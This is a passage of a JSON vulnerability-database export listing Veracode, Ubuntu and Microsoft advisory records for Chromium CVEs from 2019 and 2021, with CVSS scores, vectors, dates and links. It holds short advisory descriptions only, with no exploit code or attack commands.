"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:10", "type": "veracode", "title": "Use After Free", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-05-01T06:49:46", "id": "VERACODE:29635", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29635/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:28", "description": "chromium is vulnerable to denial of service (DoS). The vulnerability exists through a heap buffer overflow in `TabStrip`.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:11", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-12-03T20:13:28", "id": "VERACODE:29636", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29636/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:25", "description": "chromium is vulnerable to heap buffer overflow. The vulnerability exists when an attacker send a malicious HTML page, causing a heap corruption.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:18", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-12-03T20:11:25", "id": "VERACODE:29638", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29638/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:26", "description": "chromium is vulnerable to denial of service (DoS). The vulnerability exists through a heap buffer overflow when parsing a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:12", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-12-03T20:12:02", "id": "VERACODE:29637", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29637/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:23", "description": "chromium:sid is vulnerable to a denial-of-service vulnerability. An attacker can use a malicious HTTP page to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:07", "type": "veracode", "title": "Denial Of Service(DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-12-03T20:11:23", "id": "VERACODE:29632", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29632/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:21:34", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior\nto 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21164", "href": "https://ubuntu.com/security/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:21:35", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior\nto 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a\ncrafted HTML page and a malicious server.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21163", "href": "https://ubuntu.com/security/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:21:35", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21162", "href": "https://ubuntu.com/security/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:34", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21161", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21161", "href": "https://ubuntu.com/security/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:37", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21159", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21159", "href": "https://ubuntu.com/security/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:43", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21160", "href": "https://ubuntu.com/security/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:34:34", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-25T00:00:00", "id": "UB:CVE-2019-13720", "href": "https://ubuntu.com/security/CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:34", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote\nattacker to potentially exploit heap corruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21166", "href": "https://ubuntu.com/security/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-04T20:03:59", "type": "mscve", "title": "Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21164", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-04T20:03:59", "type": "mscve", "title": "Chromium CVE-2021-21163: Insufficient data validation in Reader Mode", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21163", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:58", "type": "mscve", "title": "Chromium CVE-2021-21162: Use after free in WebRTC", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-04T20:03:58", "id": "MS:CVE-2021-21162", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:57", "type": "mscve", "title": "Chromium CVE-2021-21161: Heap buffer overflow in TabStrip", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-04T20:03:57", "id": "MS:CVE-2021-21161", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:55", "type": "mscve", "title": "Chromium CVE-2021-21159: Heap buffer overflow in TabStrip", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-04T20:03:55", "id": "MS:CVE-2021-21159", "href": 